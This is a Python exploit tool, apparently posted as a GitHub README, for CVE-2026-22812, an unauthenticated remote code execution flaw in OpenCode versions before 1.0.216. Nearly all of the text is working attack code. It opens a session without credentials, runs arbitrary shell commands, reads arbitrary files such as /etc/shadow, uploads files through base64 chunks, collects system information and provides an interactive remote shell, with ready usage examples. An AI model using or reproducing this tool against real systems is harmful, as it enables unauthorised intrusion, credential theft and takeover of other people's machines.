README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import argparse
import sys
import json
import os
import readline
from urllib.parse import urlparse
from datetime import datetime
from typing import Optional, Dict, Any
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class OpenCodeExploit:
def __init__(self, target: str, timeout: int = 10, proxy: str = None):
self.target = target.rstrip('/')
self.timeout = timeout
self.session = requests.Session()
self.session_id = None
self.pty_id = None
# Setup session
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Content-Type': 'application/json'
})
# Setup proxy if provided
if proxy:
self.session.proxies = {
'http': proxy,
'https': proxy
}
# Statistics
self.stats = {
'commands_executed': 0,
'files_read': 0,
'files_written': 0,
'errors': 0
}
def log(self, message: str, level: str = "INFO"):
"""Print formatted log messages"""
colors = {
"INFO": Colors.OKBLUE,
"SUCCESS": Colors.OKGREEN,
"ERROR": Colors.FAIL,
"WARNING": Colors.WARNING,
"DEBUG": Colors.OKCYAN
}
prefixes = {
"INFO": "[*]",
"SUCCESS": "[+]",
"ERROR": "[-]",
"WARNING": "[!]",
"DEBUG": "[.]"
}
color = colors.get(level, "")
prefix = prefixes.get(level, "[?]")
print(f"{color}{prefix} {message}{Colors.ENDC}")
def verify_target(self) -> bool:
try:
self.log(f"Verifying target: {self.target}")
# Try to create session
session_id = self.create_session()
if session_id:
self.log("Target is VULNERABLE!", "SUCCESS")
return True
else:
self.log("Target does not appear vulnerable", "ERROR")
return False
except Exception as e:
self.log(f"Target verification failed: {str(e)}", "ERROR")
return False
def create_session(self) -> Optional[str]:
try:
url = f"{self.target}/session"
self.log(f"Creating session...", "INFO")
response = self.session.post(
url,
json={},
timeout=self.timeout,
verify=False
)
if response.status_code == 200:
try:
data = response.json()
if 'id' in data:
self.session_id = data['id']
self.log(f"Session created: {self.session_id}", "SUCCESS")
return self.session_id
except (json.JSONDecodeError, KeyError):
pass
return None
except requests.exceptions.RequestException as e:
self.log(f"Session creation failed: {str(e)}", "ERROR")
self.stats['errors'] += 1
return None
#Execute arbitrary shell command
def execute_command(self, command: str, silent: bool = False) -> Optional[Dict]:
if not self.session_id:
if not self.create_session():
return None
try:
if not silent:
self.log(f"Executing: {command}")
url = f"{self.target}/session/{self.session_id}/shell"
payload = {
"agent": "build",
"command": command
}
response = self.session.post(
url,
json=payload,
timeout=self.timeout,
verify=False
)
self.stats['commands_executed'] += 1
if response.status_code in [200, 201, 202]:
if not silent:
self.log("Command executed successfully", "SUCCESS")
try:
return response.json()
except json.JSONDecodeError:
return {"output": response.text}
else:
if not silent:
self.log(f"Command failed: HTTP {response.status_code}", "ERROR")
self.stats['errors'] += 1
return None
except requests.exceptions.RequestException as e:
if not silent:
self.log(f"Execution error: {str(e)}", "ERROR")
self.stats['errors'] += 1
return None
def create_pty(self) -> Optional[str]:
try:
self.log("Creating PTY session...")
url = f"{self.target}/pty"
response = self.session.post(
url,
json={},
timeout=self.timeout,
verify=False
)
if response.status_code in [200, 201]:
try:
data = response.json()
if 'id' in data:
self.pty_id = data['id']
self.log(f"PTY created: {self.pty_id}", "SUCCESS")
return self.pty_id
except:
pass
self.log("PTY created (no ID returned)", "SUCCESS")
return "default"
self.log(f"PTY creation failed: HTTP {response.status_code}", "ERROR")
return None
except requests.exceptions.RequestException as e:
self.log(f"PTY error: {str(e)}", "ERROR")
return None
#Read arbitrary file from target
def read_file(self, filepath: str) -> Optional[str]:
try:
self.log(f"Reading file: {filepath}")
url = f"{self.target}/file/content"
params = {"path": filepath}
response = self.session.get(
url,
params=params,
timeout=self.timeout,
verify=False
)
if response.status_code == 200:
self.stats['files_read'] += 1
self.log(f"File read successfully ({len(response.text)} bytes)", "SUCCESS")
return response.text
else:
self.log(f"File read failed: HTTP {response.status_code}", "ERROR")
self.stats['errors'] += 1
return None
except requests.exceptions.RequestException as e:
self.log(f"File read error: {str(e)}", "ERROR")
self.stats['errors'] += 1
return None
#Write file to target system via command execution
def write_file(self, filepath: str, content: str) -> bool:
try:
self.log(f"Writing file: {filepath}")
import base64
encoded = base64.b64encode(content.encode()).decode()
command = f"echo {encoded} | base64 -d > {filepath}"
result = self.execute_command(command, silent=True)
if result:
verify_cmd = f"test -f {filepath} && echo 'OK'"
verify = self.execute_command(verify_cmd, silent=True)
if verify and 'OK' in str(verify):
self.stats['files_written'] += 1
self.log(f"File written successfully", "SUCCESS")
return True
self.log("File write failed", "ERROR")
return False
except Exception as e:
self.log(f"File write error: {str(e)}", "ERROR")
return False
#Upload local file to target
def upload_file(self, local_path: str, remote_path: str) -> bool:
try:
if not os.path.exists(local_path):
self.log(f"Local file not found: {local_path}", "ERROR")
return False
self.log(f"Uploading: {local_path} -> {remote_path}")
with open(local_path, 'rb') as f:
content = f.read()
import base64
encoded = base64.b64encode(content).decode()
if len(encoded) > 50000:
self.log("Large file, uploading in chunks...")
chunk_size = 50000
chunks = [encoded[i:i+chunk_size] for i in range(0, len(encoded), chunk_size)]
self.execute_command(f"rm -f {remote_path}", silent=True)
for i, chunk in enumerate(chunks):
cmd = f"echo {chunk} >> {remote_path}.b64"
if not self.execute_command(cmd, silent=True):
self.log(f"Upload failed at chunk {i+1}", "ERROR")
return False
decode_cmd = f"base64 -d {remote_path}.b64 > {remote_path} && rm {remote_path}.b64"
self.execute_command(decode_cmd, silent=True)
else:
command = f"echo {encoded} | base64 -d > {remote_path}"
self.execute_command(command, silent=True)
verify_cmd = f"ls -lh {remote_path}"
result = self.execute_command(verify_cmd, silent=True)
if result:
self.log("Upload successful!", "SUCCESS")
return True
else:
self.log("Upload verification failed", "ERROR")
return False
except Exception as e:
self.log(f"Upload error: {str(e)}", "ERROR")
return False
#Download file from target
def download_file(self, remote_path: str, local_path: str) -> bool:
try:
self.log(f"Downloading: {remote_path} -> {local_path}")
content = self.read_file(remote_path)
if content:
with open(local_path, 'w') as f:
f.write(content)
self.log(f"Downloaded successfully ({len(content)} bytes)", "SUCCESS")
return True
else:
self.log("Download failed", "ERROR")
return False
except Exception as e:
self.log(f"Download error: {str(e)}", "ERROR")
return False
def get_system_info(self) -> Dict[str, str]:
self.log("Gathering system information...")
info = {}
commands = {
'hostname': 'hostname',
'username': 'whoami',
'user_id': 'id',
'current_dir': 'pwd',
'kernel': 'uname -a',
'os_release': 'cat /etc/os-release 2>/dev/null | head -5',
'ip_address': 'ip addr show 2>/dev/null | grep inet | head -5',
'processes': 'ps aux | head -10'
}
for key, cmd in commands.items():
result = self.execute_command(cmd, silent=True)
if result:
info[key] = str(result).strip()
return info
#Interactive shell mode
def interactive_shell(self):
if not self.session_id:
if not self.create_session():
return
print(f"\n{Colors.OKGREEN}{Colors.BOLD}[*] Entering interactive shell mode{Colors.ENDC}")
print(f"{Colors.WARNING}[!] Type 'help' for commands, 'exit' to quit{Colors.ENDC}\n")
hostname_result = self.execute_command("hostname", silent=True)
hostname = str(hostname_result).strip() if hostname_result else "target"
username_result = self.execute_command("whoami", silent=True)
username = str(username_result).strip() if username_result else "user"
while True:
try:
prompt = f"{Colors.OKGREEN}{username}@{hostname}{Colors.ENDC}$ "
cmd = input(prompt).strip()
if not cmd:
continue
if cmd.lower() == 'exit':
print(f"{Colors.WARNING}[*] Exiting...{Colors.ENDC}")
break
elif cmd.lower() == 'help':
self.print_shell_help()
continue
elif cmd.startswith('read '):
filepath = cmd[5:].strip()
content = self.read_file(filepath)
if content:
print(content)
continue
elif cmd.startswith('download '):
parts = cmd.split()
if len(parts) >= 3:
self.download_file(parts[1], parts[2])
else:
print(f"{Colors.FAIL}[-] Usage: download <remote_path> <local_path>{Colors.ENDC}")
continue
elif cmd.startswith('upload '):
parts = cmd.split()
if len(parts) >= 3:
self.upload_file(parts[1], parts[2])
else:
print(f"{Colors.FAIL}[-] Usage: upload <local_path> <remote_path>{Colors.ENDC}")
continue
elif cmd == 'sysinfo':
info = self.get_system_info()
print(json.dumps(info, indent=2))
continue
elif cmd == 'stats':
self.print_statistics()
continue
elif cmd == 'session':
print(f"Session ID: {self.session_id}")
continue
result = self.execute_command(cmd, silent=True)
if result:
output = result.get('output') or str(result)
if output and output != '{}':
print(output)
except KeyboardInterrupt:
print(f"\n{Colors.WARNING}[!] Interrupted. Type 'exit' to quit.{Colors.ENDC}")
except EOFError:
break
except Exception as e:
print(f"{Colors.FAIL}[-] Error: {str(e)}{Colors.ENDC}")
def print_shell_help(self):
help_text = f"""
{Colors.BOLD}Interactive Shell Commands:{Colors.ENDC}
{Colors.OKCYAN}Special Commands:{Colors.ENDC}
help Show this help
exit Exit interactive shell
read <file> Read file content
download <remote> <local> Download file
upload <local> <remote> Upload file
sysinfo Gather system information
stats Show exploitation statistics
session Show current session ID
{Colors.OKCYAN}Any other command:{Colors.ENDC}
Will be executed as a shell command on the target
{Colors.WARNING}Examples:{Colors.ENDC}
ls -la
cat /etc/passwd
read /etc/shadow
download /etc/hosts ./hosts.txt
upload shell.sh /tmp/shell.sh
"""
print(help_text)
def print_statistics(self):
print(f"\n{Colors.BOLD}Exploitation Statistics:{Colors.ENDC}")
print(f" Commands Executed: {self.stats['commands_executed']}")
print(f" Files Read: {self.stats['files_read']}")
print(f" Files Written: {self.stats['files_written']}")
print(f" Errors: {self.stats['errors']}\n")
def print_banner():
banner = f"""
{Colors.FAIL}{Colors.BOLD}
╔════════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2026-22812 Exploit Tool v1.0.0 ║
║ OpenCode Unauthenticated RCE Exploitation ║
║ ║
║ Target: OpenCode < 1.0.216 ║
║ CVSS Score: 8.8 (High) ║
║ Type: Unauthenticated Remote Code Execution ║
║ ║
║ Author: @rohmatariow ║
║ GitHub: github.com/rohmatariow/CVE-2026-22812-exploit ║
║ ║
╚════════════════════════════════════════════════════════════════╝
{Colors.ENDC}
"""
print(banner)
def main():
print_banner()
parser = argparse.ArgumentParser(
description='CVE-2026-22812 Exploitation Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=f"""
{Colors.BOLD}Examples:{Colors.ENDC}
# Interactive shell
python3 exploit.py -t http://192.168.1.10:4096 -i
# Execute single command
python3 exploit.py -t http://192.168.1.10:4096 -c "id"
# Read file
python3 exploit.py -t http://192.168.1.10:4096 -r /etc/passwd
# Upload file
python3 exploit.py -t http://192.168.1.10:4096 --upload shell.sh /tmp/shell.sh
# Download file
python3 exploit.py -t http://192.168.1.10:4096 --download /etc/shadow ./shadow.txt
# Gather system info
python3 exploit.py -t http://192.168.1.10:4096 --sysinfo
# Use with proxy (Burp)
python3 exploit.py -t http://target:4096 -c "id" --proxy http://127.0.0.1:8080
"""
)
parser.add_argument('-t', '--target', required=True,
help='Target URL (e.g., http://192.168.1.10:4096)')
action_group = parser.add_mutually_exclusive_group()
action_group.add_argument('-c', '--command', help='Execute single command')
action_group.add_argument('-r', '--read', help='Read file')
action_group.add_argument('-i', '--interactive', action='store_true',
help='Interactive shell mode')
action_group.add_argument('--sysinfo', action='store_true',
help='Gather system information')
action_group.add_argument('--pty', action='store_true',
help='Create PTY session')
parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'),
help='Upload file: --upload local.txt /tmp/remote.txt')
parser.add_argument('--download', nargs=2, metavar=('REMOTE', 'LOCAL'),
help='Download file: --download /etc/passwd ./passwd.txt')
parser.add_argument('--timeout', type=int, default=10,
help='Request timeout in seconds (default: 10)')
parser.add_argument('--proxy', help='Proxy URL (e.g., http://127.0.0.1:8080)')
parser.add_argument('--verify', action='store_true',
help='Only verify if target is vulnerable')
args = parser.parse_args()
try:
exploit = OpenCodeExploit(
target=args.target,
timeout=args.timeout,
proxy=args.proxy
)
if args.verify or not any([args.command, args.read, args.interactive,
args.sysinfo, args.pty, args.upload, args.download]):
if exploit.verify_target():
print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] Target is VULNERABLE to CVE-2026-22812!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
sys.exit(0)
else:
print(f"\n{Colors.FAIL}[-] Target does not appear vulnerable{Colors.ENDC}\n")
sys.exit(1)
if not exploit.create_session():
print(f"\n{Colors.FAIL}[-] Failed to create session. Target may not be vulnerable.{Colors.ENDC}\n")
sys.exit(1)
print(f"\n{Colors.OKGREEN}[+] Target is VULNERABLE!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
if args.interactive:
exploit.interactive_shell()
elif args.command:
result = exploit.execute_command(args.command)
if result:
output = result.get('output') or json.dumps(result, indent=2)
print(f"\n{output}\n")
elif args.read:
content = exploit.read_file(args.read)
if content:
print(f"\n{content}\n")
elif args.sysinfo:
info = exploit.get_system_info()
print(f"\n{Colors.BOLD}System Information:{Colors.ENDC}")
print(json.dumps(info, indent=2))
print()
elif args.pty:
pty_id = exploit.create_pty()
if pty_id:
print(f"\n{Colors.OKGREEN}[+] PTY Session ID: {pty_id}{Colors.ENDC}\n")
elif args.upload:
exploit.upload_file(args.upload[0], args.upload[1])
elif args.download:
exploit.download_file(args.download[0], args.download[1])
if exploit.stats['commands_executed'] > 0 or exploit.stats['files_read'] > 0:
exploit.print_statistics()
except KeyboardInterrupt:
print(f"\n{Colors.WARNING}[!] Interrupted by user{Colors.ENDC}\n")
sys.exit(130)
except Exception as e:
print(f"\n{Colors.FAIL}[-] Fatal error: {str(e)}{Colors.ENDC}\n")
sys.exit(1)
if __name__ == "__main__":
main()